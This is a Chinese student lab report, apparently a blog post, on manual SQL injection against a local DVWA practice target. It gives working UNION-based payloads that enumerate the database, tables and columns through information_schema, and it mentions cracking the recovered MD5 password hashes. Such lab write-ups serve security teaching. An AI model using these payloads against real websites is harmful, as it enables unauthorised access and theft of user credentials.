1+X 网络安全运营平台与管理 sql注入实验报告

实验目的:

掌握SQLmap 的使用 SQL注入漏洞利用

1、了解数据库的查询规则

2、熟悉SQL查询语句

3、了解SQL注入的危害性

实验设备 (环境) 

          环境:phpstudy软件  dvwa靶场  Windows 10 x64

实验要求:

        1.判断是否存在注入,注入是字符型还是数字型;

        2.猜解当前数据库名;

        3.猜解数据库中的表名;

        4.猜解表中的字段名;

        5.猜解数据

实验原理:

       1、数据库基础

       2、SQL注入漏洞利用

       3、报错注入

       4、盲注

       5、HTTP文件头注入

       6、SQLmap 的使用

实验步骤:

1.访问靶场地址http://127.0.0.1/DVWA-master/security.php,

在dvwa security选项中,可以调整dvwa的难易程度 

将安全等级改为low

2.选择SQL Injection,在输入框随意输入数字查看回显

3.判断是否存在SQL注入

  • 输入1提交
  • 输入1'提交

  • 输入1 and 1=1 提交

  •  输入1 and 1=2 提交

 由上可以看出是存在注入点的,并且是以单引号闭合的,

所以我们猜测sql查询语句是这样的:

Select  First name的列名and Surname的列名 from 表名 where id的列名='id'

4.判断列数

  • 输入1' order by 2# 提交
  •  输入1' order by 3# 提交

 

 由此,我们判断列数为2列

5.UNION注入

1' union select 1,2#

 从上图可以看出有2个回显

6.查询当前的数据库及版本

输入 1' union select version(),database()#

 7.获取数据库中的表

1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#或者

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

 8.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 9.获取字段中的数据

 10.这里密码使用了MD5加密,可在https://www.cmd5.com/进行解密

 得到密码

实验总结:

本次实验过程中,了解了其原理并掌握了其注入的方法及流程。在寻找可进行注入的URL过程中,尝试着对多个URL进行SQL注入,使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞,确认注入是字符型还是数字型;判断列,然后就行UNION注入进而猜解当前数据库名表名;字段名;从而获得数据


 加油各位( •̀ ω •́ )y 期待与君再相逢

  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路baby

你的鼓励将是我创作的最大动力✌

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值